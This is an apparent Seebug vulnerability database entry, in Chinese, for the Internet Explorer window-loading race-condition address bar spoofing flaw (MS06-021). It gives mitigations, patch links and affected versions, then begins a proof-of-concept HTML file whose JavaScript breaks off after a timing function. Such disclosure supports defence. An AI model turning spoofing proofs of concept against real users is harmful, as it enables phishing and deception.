Internet Explorer窗口加载竞争条件地址栏欺骗漏洞(MS06-021)

2006-10-28T00:00:00
ID SSV:262
Type seebug
Reporter Root
Modified 2006-10-28T00:00:00

Description

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

  • 配置Internet Explorer在运行活动脚本之前要求提示,或在Internet和本地intranet安全区中禁用活动脚本。
  • 将Internet和本地intranet安全区设置为“高”以在运行ActiveX控件和活动脚本之前要求提示。

厂商补丁:

Microsoft

Microsoft已经为此发布了一个安全公告(MS06-021)以及相应补丁: MS06-021:Cumulative Security Update for Internet Explorer (916281) 链接:http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx

Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.0 SP4 <*来源:Hai Nam Luke (hainamluke@yahoo.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114408940420872&w=2 http://secunia.com/advisories/19521/print/ http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx http://www.us-cert.gov/cas/techalerts/TA06-164A.html *>

                                        
                                            
                                                ##### LukesTest.htm #####
&lt;script language=&quot;javascript&quot;&gt;
function pause(ms) 
{
    date = new Date();
    var curDate = null;

    do { var curDate = new Date(); } 
    while(cur